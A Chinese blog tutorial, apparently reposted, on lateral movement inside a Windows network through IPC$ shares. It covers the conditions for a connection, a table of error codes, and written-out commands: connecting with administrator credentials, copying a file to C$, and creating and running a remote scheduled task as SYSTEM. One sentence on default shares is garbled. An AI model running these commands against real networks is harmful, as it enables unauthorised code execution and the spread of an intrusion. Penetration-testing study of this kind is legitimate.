内网渗透-IPC$横向控制OA系统网络安全

Posted kali_Ma

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了内网渗透-IPC$横向控制OA系统网络安全相关的知识,希望对你有一定的参考价值。

IPC$介绍

IPC(Internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。

利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

配套教程:内网渗透-IPC$横向控制OA系统

首先,需要建立一个ipc$

net use \\\\192.168.18.10\\ipc$"密码" /user:administrator

net use

IPC$利用条件

1、开启了139、445端口
ipcs可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBios协议的应用。通过139、445(Windows2000)端口,可以实现对共享文件打印机的访问。因此,一般来讲,ipcs需要139、445端口的支持。
2、管理员开启了默认共享
默认共享是为了方便管理员进行远程管理而默认开启 的,包括所有的逻辑盘(c 、 d 、d d、e 等和系统目录 w i n n t 或 w i n d o w s ( a d m i n S ) 通过 i p c 等和系统目录winnt或windows(adminS)通过ipc 等和系统目录winntwindows(adminS)通过ipc,可以实现对这些默认共享目录的访问。

IPC$连接失败原因

①用户名或密码错误
②目标没有打开ipcs默认共享
③不能成功连接目标的139、445端口

IPC$连接常见错误

错误信息原因
错误号5拒绝访问
错误号51Windows无法找到网络路径,即网络中存在问题
错误号53找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动目标有防火墙(端口过滤)
错误号67找不到网络名,包括lanmanworkstation服务未启动、ipcs已被删除
错误号1219提供的凭据与已存在的凭据集冲突。例如,已经和目标建立了ipcs,需要在删除原连接后重新进行连接
错误号1326未知的用户名或错误的密码。
错误号l792试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连接域控制器时会出现此情况)
错误号2242此用户的密码已经过期。例如,目标机器设置了账号管理策略,强制用户定期修改密码

利用方式-windows自带命令

dir命令

在使用netuse命令与远程目标机器建立ipcs后,可以使用dir命令列出远程主机中的文件,如图

dir  \\\\192.168.18.10\\c$

tasklist命令

在使用net use命令与远程目标机器建立ipcs后,可以使用tasklist命令的/S、/U/P参数列出远程主机上运行的进程

tasklist  /s192.168.18.10

利用方式-schtasks

(1)查看系统时间

net  time  \\\\IP地址


(2)复制文件

copy   文件  \\\\IP地址\\C$


(3)创建计划任务

schtasks  /create /s  IP地址  /tn  计划任务名  /sc onstart /tr c:\\文件/ru system  /f


(4)执行计划任务

schtasks  /run  /s IP地址 /i /tn "计划任务名"


(5)删除计划任务

schtasks  /delete  /s  IP地址  /tn "计划任务名"  /f


(6)清除IPC连接

net use \\\\IP /del /y

总结

单看文字教程可能大部分小伙伴一脸懵,特奉上视频教程
配套教程:内网渗透-IPC$横向控制OA系统

以上是关于内网渗透-IPC$横向控制OA系统网络安全的主要内容,如果未能解决你的问题,请参考以下文章

《内网安全攻防:渗透测试实战指南》读书笔记:域内横向移动分析及防御

《内网安全攻防:渗透测试实战指南》读书笔记:域内横向移动分析及防御

《内网安全攻防:渗透测试实战指南》读书笔记:域内横向移动分析及防御

内网渗透测试理论学习之第四篇内网渗透域的横向移动

简单的内网渗透靶场实战(tp漏洞msfpsexec横向渗透权限维持)

网安学习-内网渗透3